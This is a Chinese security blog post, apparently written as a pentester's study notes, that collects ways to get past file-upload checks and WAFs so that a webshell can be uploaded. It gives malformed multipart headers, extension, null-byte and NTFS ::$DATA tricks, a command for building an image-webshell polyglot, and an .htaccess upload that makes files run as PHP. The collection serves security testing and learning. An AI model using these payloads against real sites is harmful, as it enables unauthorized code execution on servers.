<!DOCTYPE html>


<html lang="ZH-CH" >


<head>
  <meta charset="utf-8" />
   
  <meta name="keywords" content="safe" />
   
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <title>
    学习文件上传逻辑绕过与waf绕过的各种姿势 |  clancyb00m`s Blog
  </title>
  <meta name="generator" content="hexo-theme-yilia-plus">
  
  <link rel="shortcut icon" href="/favicon.ico" />
  
  
<link rel="stylesheet" href="/dist/main.css">

  
  <script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>
  
  

  

</head>

</html>

<body>
  <div id="app">
    <main class="content on">
      <section class="outer">
  <article id="post-学习文件上传逻辑绕过与waf绕过的各种姿势" class="article article-type-post" itemscope
  itemprop="blogPost" data-scroll-reveal>

  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  学习文件上传逻辑绕过与waf绕过的各种姿势
</h1>
 

    </header>
    

    
    <div class="article-meta">
      <a href="/2020/09/04/%E5%AD%A6%E4%B9%A0%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%80%BB%E8%BE%91%E7%BB%95%E8%BF%87%E4%B8%8Ewaf%E7%BB%95%E8%BF%87%E7%9A%84%E5%90%84%E7%A7%8D%E5%A7%BF%E5%8A%BF/" class="article-date">
  <time datetime="2020-09-04T14:25:10.000Z" itemprop="datePublished">2020-09-04</time>
</a>
      
  <div class="article-category">
    <a class="article-category-link" href="/categories/web%E5%AE%89%E5%85%A8/">web安全</a>
  </div>

      
      
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> 字数统计:</span>
            <span class="post-count">1.7k字</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> 阅读时长≈</span>
            <span class="post-count">6分钟</span>
        </span>
    </span>
</div>

      
    </div>
    

    
    
    <div class="tocbot"></div>





    

    
    <div class="article-entry" itemprop="articleBody">
      
      

      
      <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>在渗透中遇到文件上传总是各种绕不过，关键是不知道几种姿势，想绕都没得绕，故打算总结一下，以后至少遇到了还能对线一下</p>
<blockquote>
<p>我是总结网上的好文章，遇到了方便查找</p>
</blockquote>
<h1 id="参考文章"><a href="#参考文章" class="headerlink" title="参考文章"></a>参考文章</h1><p>文中所写（图、文）均来自以下几篇文章：</p>
<a id="more"></a>
<p><a href="https://mp.weixin.qq.com/s/yd-wewpy685WcvWQ5g3Ncg" target="_blank" rel="noopener">文件上传漏洞另类绕过技巧及挖掘案例全汇总</a></p>
<p><a href="https://paper.seebug.org/219/" target="_blank" rel="noopener">我的WafBypass之道（upload篇）</a></p>
<h1 id="测试思路"><a href="#测试思路" class="headerlink" title="测试思路"></a>测试思路</h1><ol>
<li><p>首先尝试直接上传脚本文件进行RCE；</p>
</li>
<li><p>若存在过滤，对于检测机制进行猜测，确定机制后尝试绕过；</p>
</li>
<li><p>若无法绕过上传，插入脚本后寻找解析/文件包含漏洞；</p>
</li>
<li><p>换其他类型文件：html、js、svg等转到挖掘其他漏洞。</p>
</li>
</ol>
<h1 id="绕过"><a href="#绕过" class="headerlink" title="绕过"></a>绕过</h1><p><strong>逻辑绕过</strong></p>
<p>目录</p>
<ul>
<li>前端检测和content-type字段检测</li>
<li>后缀名黑白名单绕过</li>
<li>文件头和文件内容检测</li>
<li>二次渲染绕过</li>
<li>条件竞争绕过</li>
</ul>
<p><strong>waf绕过</strong></p>
<p>大佬的waf绕过总结</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">1. filename在content-type下面</span><br><span class="line">2. .asp&#123;80-90&#125;</span><br><span class="line">3. NTFS ADS</span><br><span class="line">4. .asp...</span><br><span class="line">5. boundary不一致</span><br><span class="line">6. iis6分号截断asp.asp;asp.jpg</span><br><span class="line">7. apache解析漏洞php.php.ddd</span><br><span class="line">8. boundary和content-disposition中间插入换行</span><br><span class="line">9. hello.php:a.jpg然后hello.&lt;&lt;&lt;</span><br><span class="line">10. filename&#x3D;php.php</span><br><span class="line">11. filename&#x3D;&quot;a.txt&quot;;filename&#x3D;&quot;a.php&quot;</span><br><span class="line">12. name&#x3D;\n&quot;file&quot;;filename&#x3D;&quot;a.php&quot;</span><br><span class="line">13. content-disposition:\n</span><br><span class="line">14. .htaccess文件</span><br><span class="line">15. a.jpg.\nphp</span><br><span class="line">16. 去掉content-disposition的form-data字段</span><br><span class="line">17. php&lt;5.3 单双引号截断特性</span><br><span class="line">18. 删掉content-disposition: form-data;</span><br><span class="line">19. content-disposition\00:</span><br><span class="line">20. &#123;char&#125;+content-disposition</span><br><span class="line">21. head头的content-type: tab</span><br><span class="line">22. head头的content-type: multipart&#x2F;form-DATA</span><br><span class="line">23. filename后缀改为大写</span><br><span class="line">24. head头的Content-Type: multipart&#x2F;form-data;\n</span><br><span class="line">25. .asp空格</span><br><span class="line">26. .asp0x00.jpg截断</span><br><span class="line">27. 双boundary</span><br><span class="line">28. file\nname&#x3D;&quot;php.php&quot;</span><br><span class="line">29. head头content-type空格:</span><br><span class="line">30. form-data字段与name字段交换位置</span><br></pre></td></tr></table></figure>

<h2 id="逻辑绕过"><a href="#逻辑绕过" class="headerlink" title="逻辑绕过"></a>逻辑绕过</h2><h3 id="前端检测和content-type字段检测"><a href="#前端检测和content-type字段检测" class="headerlink" title="前端检测和content-type字段检测"></a>前端检测和content-type字段检测</h3><p>在本地将shell文件后缀名改为合法后缀名，通过burp抓包改后缀名直接绕过这两种检测</p>
<h3 id="后缀名黑白名单绕过"><a href="#后缀名黑白名单绕过" class="headerlink" title="后缀名黑白名单绕过"></a>后缀名黑白名单绕过</h3><p><strong>黑名单</strong></p>
<p>以下替换后缀也可以解析为shell：</p>
<p><strong>php</strong>：.phtml,.phpt,.php3,.php3p</p>
<p><strong>asp</strong>：.aspx，asmx，ashx，web.config</p>
<p><strong>perl</strong>:.pl,.pm,.cgi,.lib</p>
<p><strong>jsp</strong>:.jspx,.jsw,.jsv,.jspf</p>
<p><strong>Coldfusion</strong>:.cfm,.cfml,.cfc,.dbm</p>
<p>另外可以配合操作系统的文件命名规则：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.php.,.php空格，.php:1.jpg,.php::$DATA等</span><br></pre></td></tr></table></figure>

<p>这些后缀的文件会被windows系统自动去掉不符合规则符号后面的内容，从而只留下.php。</p>
<p><strong>白名单</strong><br>黑名单绕不过就尝试空字节注入，解释如下：</p>
<blockquote>
<p>插入空字节值的原因是某些应用程序服务器脚本语言使用c/c++库来检查文件名和内容。在C/C ++中，一行以/00结尾或称为NullByte。因此，只要解释器在字符串的末尾看到一个空字节，就会停止读取，认为它已经到达字符串的末尾。</p>
</blockquote>
<p>方法：</p>
<p>在文件后缀名后面加一个16进制的<code>00</code></p>
<p><strong>在黑白名单都绕不过的情况下可以尝试利用解析漏洞</strong><br>在 <a href="https://paper.seebug.org/219/" target="_blank" rel="noopener">https://paper.seebug.org/219/</a> 中有提及</p>
<h3 id="文件头和文件内容检测"><a href="#文件头和文件内容检测" class="headerlink" title="文件头和文件内容检测"></a>文件头和文件内容检测</h3><p><strong>文件头检测</strong></p>
<p>各种文件头：</p>
<p><strong>PNG</strong>：8950 4E 47</p>
<p><strong>JPG</strong>：FFD8 FF E0 00 10 4A 46 49 46</p>
<p><strong>GIF</strong>：4749 46 38 39 61</p>
<p>在burp的Repeater模块中的hex模块进行编辑添加</p>
<p><strong>文件内容检测</strong></p>
<p>操作方法：<br>在命令行使用copy命令进行操作：</p>
<p><code>copy 1.jpg/b+shell.php/a shell.jpg</code></p>
<p><img src="/img/upload/01.png" alt=""></p>
<h3 id="二次渲染绕过"><a href="#二次渲染绕过" class="headerlink" title="二次渲染绕过"></a>二次渲染绕过</h3><p>原理：</p>
<p>对比渲染后的数据和未经渲染的数据，找出没有变化的部分，插入payload</p>
<h3 id="条件竞争绕过"><a href="#条件竞争绕过" class="headerlink" title="条件竞争绕过"></a>条件竞争绕过</h3><p>方法：</p>
<p>使用burp的Intruder模块同时发两个包上传文件+访问webshell地址</p>
<p>如果确认存在条件竞争漏洞，可以上传一个创建新文件的脚本文件，通过条件竞争创建</p>
<h2 id="waf绕过"><a href="#waf绕过" class="headerlink" title="waf绕过"></a>waf绕过</h2><p>了解上传文件的数据包的特点：</p>
<p><strong>Header中Content-Type特征有二：</strong></p>
<ol>
<li><p>multipart/form-data（form表单的enctype属性，规定为二进制数据）</p>
</li>
<li><p>boundary字符串（作用为分隔符，以区分POST数据）</p>
</li>
</ol>
<p><strong>POST内容特征有五：</strong></p>
<ol>
<li><p>Content-Disposition：form-data</p>
</li>
<li><p>name：input表单名</p>
</li>
<li><p>filename：文件名</p>
</li>
<li><p>Content-Type：定义文件的类型和网页的编码，决定浏览器将以什么形式、什么编码读取这个文件；</p>
</li>
<li><p>boundary：Content-Type的值前面加了两个—</p>
</li>
</ol>
<p><img src="/img/upload/02.png" alt=""></p>
<h3 id="waf缺陷"><a href="#waf缺陷" class="headerlink" title="waf缺陷"></a>waf缺陷</h3><ol>
<li><p>多个分号绕过<br>文件解析时，可能解析不到文件名，导致绕过。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Content-Disposition: form-data;name&#x3D;&quot;file_x&quot;;;;filename&#x3D;&quot;test.php&quot;</span><br></pre></td></tr></table></figure>
</li>
<li><p>多加一个filename绕过</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Content-Disposition: form-data;name&#x3D;&quot;file_x&quot;;filename&#x3D;&quot;test.jpg&quot;;filename&#x3D;&quot;test.php&quot;</span><br></pre></td></tr></table></figure>
</li>
<li><p>空格过狗</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Content-Type: multipart&#x2F;form-data; boundary&#x3D;---------------------------4714631421141173021852555099</span><br></pre></td></tr></table></figure>
<p>尝试在boundary后面加个空格或者其他可被正常处理的字符：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">boundary &#x3D;---------------------------4714631421141173021852555099</span><br></pre></td></tr></table></figure>
</li>
<li><p>修改header头中的boundary，使得header中的boundary和body中的boundary不一致导致waf认为这段数据无意义</p>
</li>
</ol>
<p><img src="/img/upload/04.png" alt=""></p>
<ol start="5">
<li><p>filename=”shell.asp;{ascii&gt;127}.jpg”</p>
</li>
<li><p>waf如果对Content-Disposition长度处理的不够好的话可能会导致绕过，如：</p>
</li>
</ol>
<p><img src="/img/upload/05.png" alt=""></p>
<ol start="7">
<li>构造长文件名</li>
</ol>
<p><img src="/img/upload/06.png" alt=""></p>
<p>特殊的长文件名</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">shell.asp;王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王.jpg</span><br></pre></td></tr></table></figure>

<h3 id="容器特性"><a href="#容器特性" class="headerlink" title="容器特性"></a>容器特性</h3><ol>
<li>多个Content-Disposition绕过(IIS环境)<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">------asdfghjkl</span><br><span class="line">Content-Disposition: form-data;name&#x3D;&quot;file_x&quot;;filename&#x3D;&quot;test.php&quot;</span><br><span class="line">------asdfghjkl</span><br><span class="line">Content-Disposition: form-data;name&#x3D;&quot;file_x&quot;;filename&#x3D;&quot;test.jpg&quot;</span><br><span class="line">Content-Type: image&#x2F;jpeg</span><br></pre></td></tr></table></figure></li>
<li>请求正文格式问题(IIS 6.0)<br>正常请求格式：<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Content-Disposition: form-data; name&#x3D;&quot;file1&quot;; filename&#x3D;&quot;shell.asp&quot;</span><br><span class="line">Content-Type: application&#x2F;octet-stream</span><br></pre></td></tr></table></figure></li>
<li>攻击.htaccess文件<br>上传.htaccess文件，这个方法通常用于绕过waf黑名单的，配置该目录下所有文件都将其使用php来解析：<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">Content-Disposition: form-data; name&#x3D;&quot;file&quot;; filename&#x3D;&quot;.htaccess&quot;</span><br><span class="line">Content-Type: application&#x2F;octet-stream</span><br><span class="line"></span><br><span class="line">&lt;FilesMatch &quot;shell&quot;&gt;</span><br><span class="line">SetHandler application&#x2F;x-httpd-php</span><br><span class="line">&lt;&#x2F;FilesMatch&gt;</span><br></pre></td></tr></table></figure>
<img src="/img/upload/03.png" alt=""></li>
</ol>
<h3 id="系统特性"><a href="#系统特性" class="headerlink" title="系统特性"></a>系统特性</h3><ol>
<li><p>windows特殊字符绕过</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">当我们上传一个文件的filename为shell.php&#123;%80-%99&#125;时：</span><br><span class="line"></span><br><span class="line">waf可能识别为.php&#123;%80-%99&#125;，就会导致被绕过。</span><br></pre></td></tr></table></figure>
</li>
<li><p>$DATA绕过<br>上传的文件名为<code>test.php::$DATA</code></p>
</li>
<li><p>文件名末尾加点绕过</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Content-Disposition: form-data; name&#x3D;&quot;file&quot;; filename&#x3D;&quot;shell.php.....&quot;</span><br><span class="line"></span><br><span class="line">或</span><br><span class="line"></span><br><span class="line">Content-Disposition: form-data; name&#x3D;&quot;file&quot;; filename&#x3D;&quot;shell.php::$DATA.....&quot;</span><br></pre></td></tr></table></figure>

</li>
</ol>
<h1 id="结束语"><a href="#结束语" class="headerlink" title="结束语"></a>结束语</h1><p>仅做记录，遇到的时候翻翻看，希望有用</p>

      
      <!-- reward -->
      
      <div id="reward-btn">
        打赏
      </div>
      
    </div>
    
    
      <!-- copyright -->
      
        <div class="declare">
          <ul class="post-copyright">
            <li>
              <i class="ri-copyright-line"></i>
              <strong>版权声明： </strong s>
              本博客所有文章除特别声明外，均采用 <a href="https://www.apache.org/licenses/LICENSE-2.0.html" rel="external nofollow"
                target="_blank">Apache License 2.0</a> 许可协议。转载请注明出处！
            </li>
          </ul>
        </div>
        
    <footer class="article-footer">
      
          
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        分享
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=https://clancyb00m.github.io/2020/09/04/%E5%AD%A6%E4%B9%A0%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%80%BB%E8%BE%91%E7%BB%95%E8%BF%87%E4%B8%8Ewaf%E7%BB%95%E8%BF%87%E7%9A%84%E5%90%84%E7%A7%8D%E5%A7%BF%E5%8A%BF/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" rel="tag">文件上传</a></li></ul>


    </footer>

  </div>

  
  
  <nav class="article-nav">
    
    
      <a href="/2020/07/15/redis%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E5%A4%8D%E7%8E%B0%E4%BB%A5%E5%8F%8A%E5%88%A9%E7%94%A8/" class="article-nav-link">
        <strong class="article-nav-caption">下一篇</strong>
        <div class="article-nav-title">redis未授权访问复现以及利用</div>
      </a>
    
  </nav>


  

  

  
  
  

</article>
</section>
      <footer class="footer">
  <div class="outer">
    <ul class="list-inline">
      <li>
        &copy;
        2018-2020
        clancyb00m
      </li>
      <li>
        
        Powered by
        
        
        <a href="https://hexo.io" target="_blank">Hexo</a> Theme <a href="https://github.com/Shen-Yu/hexo-theme-ayer" target="_blank">Ayer</a>
        
      </li>
    </ul>
    <ul class="list-inline">
      <li>
        
        
        <span>
  <i>PV:<span id="busuanzi_value_page_pv"></span></i>
  <i>UV:<span id="busuanzi_value_site_uv"></span></i>
</span>
        
      </li>
      
      <li>
        <!-- cnzz统计 -->
        
      </li>
    </ul>
  </div>
</footer>
      <div class="float_btns">
        <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>

<div class="todark" id="todark">
  <i class="ri-moon-line"></i>
</div>

      </div>
    </main>
    <aside class="sidebar on">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/images/ayer-side.svg" alt="clancyb00m`s Blog"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">主页</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">归档</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories">分类</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags">标签</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/null">旅行</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/null">摄影</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/null">关于我</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="Search">
        <i class="ri-search-line"></i>
      </a>
      
      
      <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
        <i class="ri-rss-line"></i>
      </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
    <script>
      if (window.matchMedia("(max-width: 768px)").matches) {
        document.querySelector('.content').classList.remove('on');
        document.querySelector('.sidebar').classList.remove('on');
      }
    </script>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i>起飞~起飞~</p>
  <div class="reward-box">
    
    <div class="reward-item">
      <img class="reward-img" src="/images/alipay.jpg">
      <span class="reward-type">支付宝</span>
    </div>
    
    
    <div class="reward-item">
      <img class="reward-img" src="/images/wechat.jpg">
      <span class="reward-type">微信</span>
    </div>
    
  </div>
</div>
    
<script src="/js/jquery-2.0.3.min.js"></script>


<script src="/js/lazyload.min.js"></script>


<script>
  try {
    var typed = new Typed("#subtitle", {
      strings: ['歪比歪比，歪比巴卜', '', ''],
      startDelay: 0,
      typeSpeed: 200,
      loop: true,
      backSpeed: 100,
      showCursor: true
    });
  } catch (err) {
  }

</script>




<script src="/js/tocbot.min.js"></script>

<script>
  // Tocbot_v4.7.0  http://tscanlin.github.io/tocbot/
  tocbot.init({
    tocSelector: '.tocbot',
    contentSelector: '.article-entry',
    headingSelector: 'h1, h2, h3, h4, h5, h6',
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer: 'main',
    positionFixedSelector: '.tocbot',
    positionFixedClass: 'is-position-fixed',
    fixedSidebarOffset: 'auto'
  });
</script>



<script src="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.js"></script>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.css">
<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js"></script>

<script src="/dist/main.js"></script>



<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.min.css">
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script>




<script src="/js/busuanzi-2.3.pure.min.js"></script>



<script type="text/javascript" src="https://js.users.51.la/20544303.js"></script>

    
  </div>
</body>

</html>